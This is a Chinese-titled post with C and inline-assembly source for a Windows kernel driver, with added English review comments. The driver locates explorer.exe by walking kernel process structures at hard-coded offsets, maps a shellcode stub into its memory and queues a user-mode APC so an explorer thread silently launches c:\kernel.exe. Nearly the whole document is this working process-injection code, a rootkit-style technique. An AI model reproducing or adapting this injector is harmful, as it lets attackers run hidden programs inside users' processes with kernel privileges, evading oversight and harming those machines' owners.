逆向工程之内核下创建用户进程代码:
//By:Eros412
#include <ntddk.h>
#include <ntifs.h>
/* File-scope state shared by DriverEntry, the APC kernel routine (myroutine)
 * and the code page that gets mapped into the target process. Exactly one
 * injection is in flight at a time, so nothing here is synchronized or
 * reference-counted. */
PKAPC_STATE ApcState;   /* attach state for KeStackAttachProcess/KeUnstackDetachProcess;
                         * allocated in DriverEntry and not freed anywhere in this file */
ULONG peprocess;        /* EPROCESS pointer handled as a raw integer while walking the process list */
ULONG explorer;         /* EPROCESS of the first process whose image name starts with "explorer.exe" */
PMDL mdl;               /* MDL describing the driver's own code page at call_me; released in myroutine */
/* Hand-declared copy of the kernel's KAPC_ENVIRONMENT enumeration (the value
 * DriverEntry passes to KeInitializeApc is 0, i.e. OriginalApcEnvironment). */
typedef enum _KAPC_ENVIRONMENT {
OriginalApcEnvironment,
AttachedApcEnvironment,
CurrentApcEnvironment,
InsertApcEnvironment
} KAPC_ENVIRONMENT;
/* Prototypes for ntoskrnl exports the file uses but declares by hand
 * (presumably because the headers of this build did not expose them).
 * KeInitializeApc/KeInsertQueueApc are the undocumented APC-queueing
 * interface; the parameter order below is what DriverEntry relies on. */
NTKERNELAPI
VOID
KeInitializeApc (
PKAPC Apc,
PETHREAD Thread,
KAPC_ENVIRONMENT Environment,
PKKERNEL_ROUTINE KernelRoutine,
PKRUNDOWN_ROUTINE RundownRoutine,
PKNORMAL_ROUTINE NormalRoutine,
KPROCESSOR_MODE ProcessorMode,   /* 1 (UserMode) in this driver: the NormalRoutine runs in user mode */
PVOID NormalContext
);
NTKERNELAPI
BOOLEAN
KeInsertQueueApc (
PKAPC Apc,
PVOID SystemArgument1,
PVOID SystemArgument2,
KPRIORITY Increment
);
/* Redeclared although it is a documented export; tag must match the allocation tag. */
NTKERNELAPI
VOID
ExFreePoolWithTag(
IN PVOID P,
IN ULONG Tag
);
/* Position-independent code stub that DriverEntry maps into the target
 * process and queues as the user-mode APC NormalRoutine.
 * It is never called in kernel mode; the body is raw bytes whose layout
 * DriverEntry depends on (see the offset arithmetic there):
 *   offset 0x00  mov eax,imm32      (5 bytes)  hard-coded absolute user-mode address
 *   offset 0x05  push 1             (2 bytes)
 *   offset 0x07  nop                (1 byte)
 *   offset 0x08  push imm32         (5 bytes)  imm32 at offset 0x09 is a placeholder (0ABCDh)
 *   offset 0x0D  call eax           (2 bytes)
 *   offset 0x0F  jmp here           (2 bytes)
 *   offset 0x11  embedded NUL-terminated string "c:\kernel.exe"
 * DriverEntry overwrites the placeholder at offset 0x09 with the user-mode
 * address of the string at offset 0x11, so the call receives the path as
 * its first argument. The absolute address in eax is build-specific
 * (presumably a kernel32 export of one particular Windows release; it is
 * not derivable from this file) and will not be valid on any other build.
 * NOTE(review): the naked function ends with `retn 0x0C`, i.e. stdcall
 * cleanup of the three PVOID arguments a PKNORMAL_ROUTINE receives. */
__declspec(naked) void call_me()
{
_asm{
mov eax,0x7C86136D            // absolute address of the user-mode API to call (hard-coded, build-specific)
push 1                        // second argument
nop
push 0ABCDh                   // first argument; imm32 patched at run time with the string address
call eax [Page]
jmp here                      // skip over the embedded string bytes
_emit 0x63 // path: c:\kernel.exe  ("c:\kernel.exe\0\0", one byte per _emit)
_emit 0x3A
_emit 0x5C
_emit 0x6B
_emit 0x65
_emit 0x72
_emit 0x6E
_emit 0x65
_emit 0x6C
_emit 0x2E
_emit 0x65
_emit 0x78
_emit 0x65
_emit 0x00
_emit 0x00
here:
nop
retn 0x0C                     // return to the APC dispatcher, popping the 3 NormalRoutine arguments
}
}
/* DriverUnload callback: tears down the device object that DriverEntry
 * created, if one exists. Nothing else (pool, MDL, APC) is released here. */
VOID OnUnload(
IN PDRIVER_OBJECT pDriverObject
)
{
    PDEVICE_OBJECT device = pDriverObject->DeviceObject;
    if (device == NULL) {
        return;
    }
    IoDeleteDevice(device);
}
/* KernelRoutine of the queued APC (registered via KeInitializeApc in
 * DriverEntry). Per the APC delivery contract it runs in the target thread
 * before the user-mode NormalRoutine (the mapped call_me copy) is invoked.
 * Apc: the KAPC allocated in DriverEntry; released here because the driver
 *      owns it and nothing else references it afterwards.
 * NormalRoutine/NormalContext/SystemArgument1/SystemArgument2 are left
 * untouched, so the user-mode routine and its arguments are delivered as
 * queued.
 * NOTE(review): Apc was allocated with tag 0x206B6444 but is freed with tag
 * 0 — the tags do not match.
 * NOTE(review): the pages are unlocked and the MDL freed while the
 * user-mode mapping made by MmMapLockedPagesSpecifyCache still exists (no
 * MmUnmapLockedPages appears in this file), so that mapping is leaked. */
VOID myroutine(
IN PKAPC Apc,
IN OUT PKNORMAL_ROUTINE *NormalRoutine,
IN OUT PVOID *NormalContext,
IN OUT PVOID *SystemArgument1,
IN OUT PVOID *SystemArgument2
)
{
ExFreePoolWithTag(Apc,0);
MmUnlockPages(mdl);
IoFreeMdl(mdl);
}
/* Driver entry point. Walks the process list for explorer.exe, picks an
 * alertable thread in it, maps a copy of call_me into explorer's user-mode
 * address space through an MDL, patches the string address into that copy,
 * and queues a user-mode APC so the thread executes it.
 * pDriverObject: the driver object; DriverUnload is set to OnUnload.
 * pRegistryPath: unused.
 * Returns STATUS_SUCCESS on every path, including the failure paths that
 * jump to end1, so the loader never sees a failure.
 * Every EPROCESS/ETHREAD offset below is hard-coded for one Windows build
 * (presumably XP-era); on any other build the same code reads unrelated
 * memory. From a defensive standpoint the observable artefacts are: a device
 * named \Device\KernelExec, a kernel driver attaching to explorer.exe, an
 * MDL-backed executable user-mode mapping, and a user-mode APC queued into
 * an explorer thread. */
NTSTATUS DriverEntry( [Page]
IN PDRIVER_OBJECT pDriverObject,
IN PUNICODE_STRING pRegistryPath
)
{
unsigned char alertable;     /* KTHREAD alertable flag, read at ETHREAD+0x164 */
int activethread;            /* EPROCESS active-thread count read at +0x1a0; only printed */
ULONG kthread;               /* target ETHREAD as an integer.
                              * NOTE(review): never assigned when explorer.exe is not found,
                              * yet it is printed and handed to KeInitializeApc below. */
PLIST_ENTRY cur;             /* starting ActiveProcessLinks entry (loop terminator) */
PLIST_ENTRY next;            /* current ActiveProcessLinks entry */
PLIST_ENTRY tcur;            /* starting thread-list entry (loop terminator) */
PLIST_ENTRY tnext;           /* current thread-list entry */
unsigned char * imagename;   /* points at EPROCESS+0x174 (image file name field) */
UNICODE_STRING us;
PDEVICE_OBJECT _device;
PRKAPC apc;                  /* KAPC object for the injected APC; owned by the driver until myroutine frees it */
PVOID mappedmemory;          /* user-mode address of the call_me copy inside explorer.exe */
ULONG jmpaddr_9;             /* user-mode address of the imm32 placeholder in the copy (offset 9) */
ULONG jmpaddr_14;            /* user-mode address of the embedded string in the copy (offset 0x11) */
RtlInitUnicodeString(&us,L\"\\\\Device\\\\KernelExec\");
/* NOTE(review): IoCreateDevice's status is ignored; _device may be uninitialised on failure. */
IoCreateDevice(pDriverObject,0,&us,FILE_DEVICE_UNKNOWN,0x100,0,&_device);
pDriverObject->DriverUnload=OnUnload;
/* Start the list walk at the current process (System, at load time) and
 * follow ActiveProcessLinks, assumed to live at EPROCESS+0x088. */
peprocess=(ULONG)IoGetCurrentProcess();
cur=next=(PLIST_ENTRY)((ULONG)peprocess+0x088);
do{
/* NOTE(review): this 255-byte allocation is overwritten on the next line and
 * never freed — it leaks one pool block per process visited. */
imagename=(unsigned char*)ExAllocatePool(NonPagedPool,255);
imagename=(unsigned char*)((ULONG)peprocess+0x174);
activethread=*(ULONG*)((ULONG)peprocess+0x1a0); [Page]
/* Case-insensitive prefix match on the first 12 characters of the image name. */
if(!_strnicmp(imagename,\"explorer.exe\",12)){
DbgPrint(\"%s\\t%d threads\",imagename,activethread);
explorer=peprocess;
/* Walk the process's thread list (head assumed at EPROCESS+0x190);
 * each entry is assumed to sit at ETHREAD+0x22C. */
tcur=tnext=(PLIST_ENTRY)((ULONG)peprocess+0x190);
do{
kthread=(ULONG)tnext-0x22C;
alertable=*(unsigned char*)(kthread+0x164);
/* A user-mode APC is only delivered to a thread that is alertable, so the
 * first alertable thread is taken as the target. */
if((int)alertable==TRUE){
DbgPrint(\"KernelExec -> Found alertable thread\");
break;
}
tnext=tnext->Flink;
}while(tnext!=tcur);
/* Leave the process loop after the first explorer.exe match, even when the
 * thread loop above found no alertable thread (kthread then holds the
 * last thread visited). */
break;
}
next=next->Flink;
peprocess=(ULONG)next-0x088;
[Page]
}while(next!=cur);
DbgPrint(\"KernelExec -> Targeted thread: 0x%p\",kthread);
/* 0x30 bytes is presumably sizeof(KAPC) on a 32-bit build; the tag spells "Ddk ". */
apc=ExAllocatePoolWithTag(NonPagedPool,0x30,0x206B6444);
/* NOTE(review): on allocation failure this only logs; execution continues with apc == NULL. */
if(apc==NULL)
DbgPrint(\"KernelExec -> Failed to allocate memory\");
/* Describe 100 bytes of the driver's own image starting at call_me. */
mdl=IoAllocateMdl(call_me,100,0,0,0);
if(mdl==0){
DbgPrint(\"KernelExec -> Failed to allocate MDL\");
ExFreePoolWithTag(apc,0);
goto end1;
}
/* AccessMode 0 = KernelMode, Operation 1 = IoWriteAccess. */
MmProbeAndLockPages(mdl,0,1);
/* NOTE(review): allocation result is not checked and the block is never freed. */
ApcState=ExAllocatePool(NonPagedPool,sizeof(KAPC_STATE));
/* Attach to explorer.exe (EPROCESS starts with KPROCESS, hence the cast) so
 * the MDL can be mapped into that process's user-mode address space. */
KeStackAttachProcess((PKPROCESS)explorer,ApcState);
/* AccessMode 1 = UserMode, CacheType 1 = MmCached, no base address, no
 * bugcheck on failure, priority 0x10 = NormalPagePriority. */
mappedmemory=MmMapLockedPagesSpecifyCache(mdl,1,1,0,0,0x10);
if(mappedmemory==NULL){
DbgPrint(\"KernelExec -> Cannot map address\");
KeUnstackDetachProcess(ApcState);
IoFreeMdl(mdl);
ExFreePoolWithTag(apc,0);
goto end1;
}
DbgPrint(\"KernelExec -> UserMode memory at address:0x%p\",mappedmemory);
/* Offsets into the mapped copy of call_me: +9 is the imm32 of `push 0ABCDh`,
 * +0x11 is the first byte of the embedded path string. */
jmpaddr_9 = (ULONG)mappedmemory+0x9;
jmpaddr_14 = (ULONG)mappedmemory+0x14-3; // relative jmp is 2 bytes, so subtract 3 [Page]
/* Store jmpaddr_14 at jmpaddr_9 through the user-mode mapping, i.e. the
 * equivalent of *(ULONG *)jmpaddr_9 = jmpaddr_14, with all registers and
 * flags preserved. Because the MDL describes the driver's own pages, this
 * presumably also changes the kernel-side call_me bytes in place. */
_asm{
pushad
pushfd
mov ecx,jmpaddr_9
mov edx,jmpaddr_14
mov [ecx],edx
popfd
popad
}
KeUnstackDetachProcess (ApcState);
/* Environment 0 = OriginalApcEnvironment, KernelRoutine = myroutine, no
 * rundown routine, NormalRoutine = the user-mode copy of call_me,
 * ProcessorMode 1 = UserMode, no NormalContext. */
KeInitializeApc(apc,(PETHREAD)kthread,0,myroutine,0,mappedmemory,1,0);
/* NOTE(review): a failed insert only logs; "APC delivered" is printed regardless. */
if(!KeInsertQueueApc(apc,0,0,0))
DbgPrint(\"KernelExec -> Failed to insert APC\");
DbgPrint(\"KernelExec -> APC delivered\");
end1:
return STATUS_SUCCESS;
}
文档说明: